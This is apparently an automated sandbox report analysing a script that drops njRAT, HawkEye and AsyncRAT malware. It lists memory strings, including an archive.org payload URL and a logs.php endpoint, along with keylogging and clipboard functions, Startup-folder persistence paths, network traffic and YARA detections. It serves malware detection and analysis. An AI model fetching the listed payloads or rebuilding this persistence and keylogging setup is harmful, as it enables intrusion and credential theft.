Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: tmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comF
Source: tmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comTTFd
Source: tmpFB21.tmp.exe, 0000000D.00000003.501081618.0000000005AA5000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.coma
Source: tmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comalic
Source: tmpFB21.tmp.exe, 0000000D.00000003.501081618.0000000005AA5000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comcomF
Source: tmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comd
Source: tmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comdG
Source: tmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comdi
Source: tmpFB21.tmp.exe, 0000000D.00000003.496944356.0000000005AB3000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comdita
Source: tmpFB21.tmp.exe, 0000000D.00000003.497421413.0000000005AB4000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comessed8
Source: tmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comitu
Source: tmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comsief
Source: tmpFB21.tmp.exe, 0000000D.00000003.497421413.0000000005AB4000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comtua
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: tmpFB21.tmp.exe, 0000000D.00000003.494270722.0000000005AA3000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn)
Source: tmpFB21.tmp.exe, 0000000D.00000003.494591560.0000000005AA2000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/S
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: tmpFB21.tmp.exe, 0000000D.00000003.494270722.0000000005AA3000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cnlw
Source: tmpFB21.tmp.exe, 0000000D.00000003.494270722.0000000005AA3000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cnm
Source: tmpFB21.tmp.exe, 0000000D.00000003.494270722.0000000005AA3000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cnu
Source: tmpFB21.tmp.exe, 0000000D.00000003.498837679.0000000005AB6000.00000004.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: tmpFB21.tmp.exe, 0000000D.00000003.498837679.0000000005AB6000.00000004.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmQK
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: tmpFB21.tmp.exe, 0000000D.00000003.495838585.0000000005AAB000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: tmpFB21.tmp.exe, 0000000D.00000003.495725552.0000000005AA5000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/3
Source: tmpFB21.tmp.exe, 0000000D.00000003.496375592.0000000005AAC000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/8
Source: tmpFB21.tmp.exe, 0000000D.00000003.496076219.0000000005AAC000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/96
Source: tmpFB21.tmp.exe, 0000000D.00000003.495725552.0000000005AA5000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/G
Source: tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/L
Source: tmpFB21.tmp.exe, 0000000D.00000003.496375592.0000000005AAC000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0et
Source: tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/arge
Source: tmpFB21.tmp.exe, 0000000D.00000003.495725552.0000000005AA5000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/het
Source: tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/i
Source: tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000003.496375592.0000000005AAC000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/3
Source: tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/G
Source: tmpFB21.tmp.exe, 0000000D.00000003.496375592.0000000005AAC000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/i
Source: tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/r
Source: tmpFB21.tmp.exe, 0000000D.00000003.495838585.0000000005AAB000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/r
Source: tmpFB21.tmp.exe, 0000000D.00000003.495725552.0000000005AA5000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/udi
Source: tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/uild
Source: tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/vno8
Source: tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/wab
Source: tmpFB21.tmp.exe, 0000000D.00000003.500377718.0000000005ADD000.00000004.00000001.sdmp String found in binary or memory: http://www.monotype.
Source: vbc.exe, 0000000F.00000003.517790333.000000000094C000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.co
Source: tmpFB21.tmp.exe.2.dr String found in binary or memory: http://www.nirsoft.net/
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: tmpFB21.tmp.exe, 0000000D.00000002.609034784.0000000003021000.00000004.00000001.sdmp String found in binary or memory: http://www.site.com/logs.php
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: tmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmp String found in binary or memory: http://www.urwpp.de
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: vbc.exe, 0000000F.00000003.517667198.000000000210C000.00000004.00000001.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activi
Source: vbc.exe, 0000000F.00000003.517790333.000000000094C000.00000004.00000001.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=30055406629
Source: vbc.exe, 0000000F.00000003.518065717.000000000094E000.00000004.00000001.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736
Source: wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmp String found in binary or memory: https://certs.godaddy.com/repository/0
Source: vbc.exe, 0000000F.00000003.517790333.000000000094C000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: vbc.exe, 0000000F.00000003.517790333.000000000094C000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&
Source: vbc.exe, 0000000F.00000003.517790333.000000000094C000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://c
Source: wscript.exe, 00000000.00000003.339775838.000001B866587000.00000004.00000001.sdmp String found in binary or memory: https://ia601504.us.archive.org/
Source: wscript.exe, 00000000.00000003.340835595.000001B863D52000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.369127141.000001B865B94000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.361151297.000001B863DE7000.00000004.00000001.sdmp, wscript.exe, 00000000.00000002.373459438.000001B865C70000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.339839120.000001B8665BF000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.368780987.000001B865B73000.00000004.00000001.sdmp, wscript.exe, 00000000.00000002.373627611.000001B865F9B000.00000004.00000001.sdmp String found in binary or memory: https://ia601504.us.archive.org/25/items/codigo_202104/codigo.txt
Source: wscript.exe, 00000000.00000003.339839120.000001B8665BF000.00000004.00000001.sdmp String found in binary or memory: https://ia601504.us.archive.org/25/items/codigo_202104/codigo.txt3u
Source: wscript.exe, 00000000.00000003.339656954.000001B863D52000.00000004.00000001.sdmp String found in binary or memory: https://ia601504.us.archive.org/25/iter
Source: wscript.exe, 00000000.00000003.339775838.000001B866587000.00000004.00000001.sdmp String found in binary or memory: https://ia601504.us.archive.org/3
Source: wscript.exe, 00000000.00000003.339775838.000001B866587000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com
Source: tmpFB21.tmp.exe String found in binary or memory: https://login.yahoo.com/config/login
Source: tmpFB21.tmp.exe String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: vbc.exe, 0000000F.00000003.517790333.000000000094C000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https:/
Source: unknown Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown HTTPS traffic detected: 207.241.227.114:443 -> 192.168.2.6:49699 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected AsyncRAT
Source: Yara match File source: 0000000C.00000000.429733559.00000000006E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.599252774.00000000006E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.601243946.0000000002AF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: tmp87E4.tmp.exe PID: 5036, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe, type: DROPPED
Source: Yara match File source: 12.0.tmp87E4.tmp.exe.6e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.tmp87E4.tmp.exe.6e0000.0.unpack, type: UNPACKEDPE
Yara detected HawkEye Keylogger
Source: Yara match File source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.609034784.0000000003021000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: tmpFB21.tmp.exe PID: 4928, type: MEMORY
Source: Yara match File source: Process Memory Space: pgr.exe PID: 1068, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, type: DROPPED
Source: Yara match File source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.pgr.exe.3a3fd88.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.tmpFB21.tmp.exe.8ffa72.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.tmpFB21.tmp.exe.8a8208.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.pgr.exe.3a46190.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.tmpFB21.tmp.exe.8a9c0d.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.tmpFB21.tmp.exe.8a9c0d.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.tmpFB21.tmp.exe.8ffa72.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.pgr.exe.3a3fd88.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.tmpFB21.tmp.exe.8a8208.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.pgr.exe.3a47b95.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.tmpFB21.tmp.exe.3048e00.4.raw.unpack, type: UNPACKEDPE
Contains functionality to log keystrokes (.Net Source)
Source: Tmp.exe.0.dr, kl.cs .Net Code: VKCodeToUnicode
Source: servieda.exe.1.dr, kl.cs .Net Code: VKCodeToUnicode
Source: 1.0.Tmp.exe.1d0000.0.unpack, kl.cs .Net Code: VKCodeToUnicode
Source: 1.2.Tmp.exe.1d0000.0.unpack, kl.cs .Net Code: VKCodeToUnicode
Source: 79c06ef4ef423d882819c4e66285ec85.exe.2.dr, kl.cs .Net Code: VKCodeToUnicode
Source: 2.2.pgr.exe.80000.0.unpack, kl.cs .Net Code: VKCodeToUnicode
Source: 2.0.pgr.exe.80000.0.unpack, kl.cs .Net Code: VKCodeToUnicode
Source: d4c6a6df7bab3dad31763de990c4ed82.exe.3.dr, kl.cs .Net Code: VKCodeToUnicode
Source: 3.2.servieda.exe.a0000.0.unpack, kl.cs .Net Code: VKCodeToUnicode
Source: 3.0.servieda.exe.a0000.0.unpack, kl.cs .Net Code: VKCodeToUnicode
Source: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, kl.cs .Net Code: VKCodeToUnicode
Contains functionality for read data from the clipboard
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 14_2_0040AC8A GetTempPathA,GetWindowsDirectoryA,GetTempFileNameA,OpenClipboard,GetLastError,DeleteFileA, 14_2_0040AC8A
Creates a DirectInput object (often for capturing keystrokes)
Source: tmpFB21.tmp.exe, 0000000D.00000002.601888472.0000000001070000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

barindex
Yara detected Njrat
Source: Yara match File source: 00000000.00000003.361826559.000001B866181000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.375381174.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.434132652.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.386399141.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.418513533.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.364575966.00000000000A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.599389764.00000000000A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.431917812.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.355914114.00000000001D2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.404397604.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.599254975.0000000000082000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.360210292.0000000000696000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.361022264.000001B86606A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.416270861.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.407415597.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.379800367.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.361732058.000001B8660A7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.409647935.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.429703452.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.363543444.000001B865F71000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.384190622.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.420692346.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.600750205.00000000006AA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.392012717.0000000000A72000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.422988044.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.397417022.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.365445146.00000000001D2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.388634565.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.381975904.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.390816638.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.414035813.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.399625080.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.395800979.0000000000A72000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.363508087.000001B865F8D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.425183434.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.377587214.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411854151.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.519777905.00000000006B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.427394879.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.401942814.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.436364231.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.369408079.000001B867140000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.360863456.0000000000082000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: d4c6a6df7bab3dad31763de990c4ed82.exe PID: 2244, type: MEMORY
Source: Yara match File source: Process Memory Space: servieda.exe PID: 5648, type: MEMORY
Source: Yara match File source: Process Memory Space: wscript.exe PID: 5972, type: MEMORY
Source: Yara match File source: Process Memory Space: Tmp.exe PID: 240, type: MEMORY
Source: Yara match File source: Process Memory Space: pgr.exe PID: 1068, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\servieda.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Tmp.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\pgr.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe, type: DROPPED
Source: Yara match File source: 0.3.wscript.exe.1b86717d130.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wscript.exe.1b8660a7cb0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wscript.exe.1b8660a7cb0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wscript.exe.1b8660a7cb0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wscript.exe.1b86717d130.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wscript.exe.1b8660a7cb0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.pgr.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.pgr.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.servieda.exe.a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.servieda.exe.a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000000.00000003.361826559.000001B866181000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.375381174.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.434132652.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.386399141.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.418513533.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000000.364575966.00000000000A2000.00000002.00020000.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000002.599389764.00000000000A2000.00000002.00020000.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.431917812.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000001.00000000.355914114.00000000001D2000.00000002.00020000.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.404397604.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000002.00000002.599254975.0000000000082000.00000002.00020000.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000002.00000002.599254975.0000000000082000.00000002.00020000.sdmp, type: MEMORY Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000003.360210292.0000000000696000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000000.00000003.361022264.000001B86606A000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.416270861.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.407415597.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.379800367.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000000.00000003.361732058.000001B8660A7000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.409647935.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000003.429703452.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000000.00000003.363543444.000001B865F71000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000000.00000003.363543444.000001B865F71000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000003.384190622.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.420692346.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000002.600750205.00000000006AA000.00000004.00000020.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000008.00000000.392012717.0000000000A72000.00000002.00020000.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.422988044.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.397417022.00000000006AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, type: MEMORY Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, type: MEMORY Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.365445146.00000000001D2000.00000002.00020000.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
